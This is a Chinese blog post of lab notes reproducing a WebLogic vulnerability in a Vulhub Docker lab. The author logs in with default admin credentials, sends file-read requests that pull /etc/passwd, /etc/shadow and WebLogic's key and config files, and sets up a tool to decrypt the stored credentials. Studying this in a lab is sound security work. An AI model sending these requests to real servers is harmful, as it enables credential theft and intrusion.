Weblogic漏洞复现

  1. Weblogic漏洞复现

cd /var/local/software

/var/local/soft/vulhub-master

    1. 解决报错

/var/local/soft/vulhub-master

✔ weblogic 17 layers [⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿]      0B/0B      Pulled                                                                                                                    294.9s

   ✔ 6599cadaf950 Pull complete                                                                                                                                                      10.3s

   ✔ 23eda618d451 Pull complete                                                                                                                                                       2.3s

   ✔ f0be3084efe9 Pull complete                                                                                                                                                       1.9s

   ✔ 52de432f084b Pull complete                                                                                                                                                       3.7s

   ✔ a3ed95caeb02 Pull complete                                                                                                                                                       4.0s

   ✔ a2318f26c625 Pull complete                                                                                                                                                      11.7s

   ✔ 1aa642dd8cc1 Pull complete                                                                                                                                                       7.5s

   ✔ b307208f8bf5 Pull complete                                                                                                                                                      20.3s

   ✔ 1dfbbdcc497d Pull complete                                                                                                                                                      12.8s

   ✔ a53e674a7606 Pull complete                                                                                                                                                      35.8s

   ✔ 5f06bb51fa3c Pull complete                                                                                                                                                      31.3s

   ✔ ff0ff72567f2 Pull complete                                                                                                                                                     189.5s

   ✔ 684862046025 Pull complete                                                                                                                                                      34.0s

   ✔ abbf8d475455 Pull complete                                                                                                                                                     252.3s

   ✔ 848eb11ef744 Pull complete                                                                                                                                                      37.6s

   ✔ 2f3438f2b83b Pull complete                                                                                                                                                      42.1s

   ✔ 8e5871e15571 Pull complete                                                                                                                                                      47.2s

[+] Building 0.0s (0/0)                                                                                                                                                     docker:default

[+] Running 1/1

 ✘ Network weak_password_default  Error                                                                                                                                               0.2s

failed to create network weak_password_default: Error response from daemon: Failed to program FILTER chain: iptables failed: iptables --wait -I FORWARD -o br-dee114e10024 -j DOCKER: iptables v1.4.21: Couldn't load target `DOCKER':No such file or directory

Try `iptables -h' or 'iptables --help' for more information.

 (exit status 2)

  1. pkill docker
  2. iptables -t nat -F
  3. ifconfig docker0 down
  4. brctl delbr docker0
  5. docker -d
  6. systmctl restart docker

systemctl restart docker

192.168.23.154:7001

http://192.168.23.154:7001/console

username weblogic

password  Oracle@123

http://192.168.23.154:7001/hello/file.jsp?path=/etc/passwd

http://192.168.23.154:7001/hello/file.jsp?path=/etc/shadow

密文绝对路径:

/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat,相对路径:security/SerializedSystemIni.dat

密钥绝对路径:

/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml ,相对路径:config/config.xml

http://192.168.23.154:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat

密文

0d0a 0d0a 04d9 d0e2 e802 2087 50b0 fa9b

9552 23f4 82ec fe8d 5697 e422 4f1d 9ca1

0081 53fc 1da3 895a 4250 6818 3186 b88a

af82 723d 28a8 220f 9f28 7338 d8c5 f9af

3651 c7e7

密钥

http://192.168.23.154:7001/hello/file.jsp?path=/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml

<?xml version='1.0' encoding='UTF-8'?>

<domain xmlns="http://xmlns.oracle.com/weblogic/domain" xmlns:sec="http://xmlns.oracle.com/weblogic/security" xmlns:wls="http://xmlns.oracle.com/weblogic/security/wls" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.oracle.com/weblogic/security/xacml http://xmlns.oracle.com/weblogic/security/xacml/1.0/xacml.xsd http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator/1.0/passwordvalidator.xsd http://xmlns.oracle.com/weblogic/domain http://xmlns.oracle.com/weblogic/1.0/domain.xsd http://xmlns.oracle.com/weblogic/security http://xmlns.oracle.com/weblogic/1.0/security.xsd http://xmlns.oracle.com/weblogic/security/wls http://xmlns.oracle.com/weblogic/security/wls/1.0/wls.xsd">

  <name>base_domain</name>

  <domain-version>10.3.6.0</domain-version>

  <security-configuration>

    <name>base_domain</name>

    <realm>

      <sec:authentication-provider xsi:type="wls:default-authenticatorType"></sec:authentication-provider>

      <sec:authentication-provider xsi:type="wls:default-identity-asserterType">

        <sec:active-type>AuthenticatedUser</sec:active-type>

      </sec:authentication-provider>

      <sec:role-mapper xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-role-mapperType"></sec:role-mapper>

      <sec:authorizer xmlns:xac="http://xmlns.oracle.com/weblogic/security/xacml" xsi:type="xac:xacml-authorizerType"></sec:authorizer>

      <sec:adjudicator xsi:type="wls:default-adjudicatorType"></sec:adjudicator>

      <sec:credential-mapper xsi:type="wls:default-credential-mapperType"></sec:credential-mapper>

      <sec:cert-path-provider xsi:type="wls:web-logic-cert-path-providerType"></sec:cert-path-provider>

      <sec:cert-path-builder>WebLogicCertPathProvider</sec:cert-path-builder>

      <sec:name>myrealm</sec:name>

      <sec:password-validator xmlns:pas="http://xmlns.oracle.com/weblogic/security/providers/passwordvalidator" xsi:type="pas:system-password-validatorType">

        <sec:name>SystemPasswordValidator</sec:name>

        <pas:min-password-length>8</pas:min-password-length>

        <pas:min-numeric-or-special-characters>1</pas:min-numeric-or-special-characters>

      </sec:password-validator>

    </realm>

    <default-realm>myrealm</default-realm>

    <credential-encrypted>{AES}VDHLmpIFsxhe5+CetHjC3Du768mgXgEeInws2SytpnqhqgWkdGFks2BYtSJzE3FrrjdLjKS9w24Krv0Ong11Bogvc8rPC6HC3eqZy8X5U8/jhzgwct+ZTRgagnYCb4zy</credential-encrypted>

    <node-manager-username>weblogic</node-manager-username>

    <node-manager-password-encrypted>{AES}yvGnizbUS0lga6iPA5LkrQdImFiS/DJ8Lw/yeE7Dt0k=</node-manager-password-encrypted>

  </security-configuration>

  <server>

    <name>AdminServer</name>

    <listen-address></listen-address>

  </server>

  <embedded-ldap>

    <name>base_domain</name>

    <credential-encrypted>{AES}uikbk+R+r6Vqv3OiFGQ4XnxJAHEnqFuni3K+SlgZxAsWEyIvLEi+O2omKTsWD9GW</credential-encrypted>

  </embedded-ldap>

  <configuration-version>10.3.6.0</configuration-version>

  <app-deployment>

    <name>_appsdir_hello_war</name>

    <target>AdminServer</target>

    <module-type>war</module-type>

    <source-path>autodeploy/hello.war</source-path>

    <security-dd-model>DDOnly</security-dd-model>

    <staging-mode>stage</staging-mode>

  </app-deployment>

  <admin-server-name>AdminServer</admin-server-name>

</domain>

λ java -jar D:\800016PenetrationTesting\023中间件漏洞\Weblogic漏洞资料\weblogic_decrypt.jar

Exception in thread "AWT-EventQueue-0" java.lang.NoClassDefFoundError: org/bouncycastle/jce/provider/BouncyCastleProvider

        at DecryptorView.makeButtonActionPerformed(DecryptorView.java:244)

        at DecryptorView.access$200(DecryptorView.java:17)

        at DecryptorView$3.actionPerformed(DecryptorView.java:100)

        at java.desktop/javax.swing.AbstractButton.fireActionPerformed(AbstractButton.java:1972)

        at java.desktop/javax.swing.AbstractButton$Handler.actionPerformed(AbstractButton.java:2313)

        at java.desktop/javax.swing.DefaultButtonModel.fireActionPerformed(DefaultButtonModel.java:405)

        at java.desktop/javax.swing.DefaultButtonModel.setPressed(DefaultButtonModel.java:262)

        at java.desktop/javax.swing.plaf.basic.BasicButtonListener.mouseReleased(BasicButtonListener.java:279)

        at java.desktop/java.awt.Component.processMouseEvent(Component.java:6626)

        at java.desktop/javax.swing.JComponent.processMouseEvent(JComponent.java:3389)

        at java.desktop/java.awt.Component.processEvent(Component.java:6391)

        at java.desktop/java.awt.Container.processEvent(Container.java:2266)

        at java.desktop/java.awt.Component.dispatchEventImpl(Component.java:5001)

        at java.desktop/java.awt.Container.dispatchEventImpl(Container.java:2324)

        at java.desktop/java.awt.Component.dispatchEvent(Component.java:4833)

        at java.desktop/java.awt.LightweightDispatcher.retargetMouseEvent(Container.java:4948)

        at java.desktop/java.awt.LightweightDispatcher.processMouseEvent(Container.java:4575)

1.下载bcprov-jdkxx-xxx.jar

bouncycastle.org

2.bcprov-jdkxx-xxx.jar放入$JAVA_HOME/jre/lib/ext

3.打开$JAVA_HOME/jre/lib/security下的java.security文件,在末尾加

  security.provider.x=org.bouncycastle.jce.provider.BouncyCastleProvider

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值